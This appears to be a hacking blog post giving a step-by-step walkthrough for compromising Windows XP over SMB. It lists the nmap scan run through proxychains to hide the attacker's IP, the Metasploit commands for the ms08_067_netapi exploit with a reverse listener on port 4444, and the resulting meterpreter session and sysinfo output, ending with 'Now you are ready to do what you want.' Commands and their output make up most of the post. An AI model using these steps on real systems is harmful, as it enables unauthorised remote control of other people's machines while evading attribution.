Exploit Samba Windows XP 2 With Backtrack

Bismillah...

Many ways to exploit Windows XP with Bactrack such as backdoring by planting the payload. But today i'm gonna show you how to exploit samba port with metasploit.

I use <<Bactrack|R3

1. Open your terminal and find the opened port with command "nmap -sV ip_target", it works if target in the same network or using ip public.                                                              For example : proxychain nmap -sV 192.168.254.128. Use proxy to hide our ip
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          WAR-FTPD 1.65 (Name Jgaa's Fan Club FTP Service)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds  => we use this port
MAC Address: 00:0C:29:F5:6A:C1 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
2. Now type "msfconsole", now drink your coffee or rearrange your music palylist.
3.  Type "search smb" we are going to use "exploit/windows/smb/ms08_067_netapi " so type "use exploit/windows/smb/ms08_067_netapi"
4. To set the target address "set RHOST ip_target"
5. Set the listener "set LHOST your_ip" and set the port "set LPORT 4444"
6. Type "exploit" to rock and roll :D the succes step will show this  "meterpreter >"
7.  To proof that we have exploited the target type "sysinfo". My system show this 
meterpreter > sysinfo
Computer        : LATIF-D65DC6E1D
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 
8. Now you are ready to do what you want. :D
The video is coming soon

Comments

Populer Post

Extract Database With Sqlmap

How To Install Mutillidae And Try A Little Test